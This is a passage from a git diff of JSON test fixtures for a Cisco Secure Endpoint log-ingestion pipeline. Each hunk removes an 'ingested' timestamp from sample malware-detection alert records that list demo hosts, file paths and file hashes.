Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3038,7 +3006,6 @@ ], "code": "1090519054", "id": "6176259234750005000", - "ingested": "2022-02-02T05:52:24.688973608Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3118,7 +3085,6 @@ ], "code": "1090519054", "id": "6176259183210398000", - "ingested": "2022-02-02T05:52:24.688974441Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3202,7 +3168,6 @@ ], "code": "1090519054", "id": "6180335966167761000", - "ingested": "2022-02-02T05:52:24.688975468Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "severity": 2 
@@ -3301,7 +3266,6 @@ ], "code": "1090519054", "id": "6533668885361590000", - "ingested": "2022-02-02T05:52:24.688976288Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3391,7 +3355,6 @@ ], "code": "1090519054", "id": "6533668885361590000", - "ingested": "2022-02-02T05:52:24.688977153Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3477,7 +3440,6 @@ ], "code": "1090519054", "id": "6533668885361590000", - "ingested": "2022-02-02T05:52:24.688977970Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "severity": 2 
@@ -3563,7 +3525,6 @@ ], "code": "1090519054", "id": "6176259135965757000", - "ingested": "2022-02-02T05:52:24.688978802Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "severity": 2 
@@ -3645,7 +3606,6 @@ ], "code": "1107296272", "id": "1489955900291000600", - "ingested": "2022-02-02T05:52:24.688979610Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "severity": 3, 
@@ -3725,7 +3685,6 @@ ], "code": "1090519054", "id": "6159251516445164000", - "ingested": "2022-02-02T05:52:24.688980421Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -3805,7 +3764,6 @@ ], "code": "1090519054", "id": "6159251516445164000", - "ingested": "2022-02-02T05:52:24.688981235Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json index eed930aea2e..343f1803e43 100644 
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -44,7 +44,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422872327Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -124,7 +123,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422874903Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -208,7 +206,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422875934Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -292,7 +289,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422876794Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
@@ -376,7 +372,6 @@ ], "code": "1090519054", "id": "6159251512150196000", - "ingested": "2022-02-02T05:52:33.422877648Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "severity": 2 
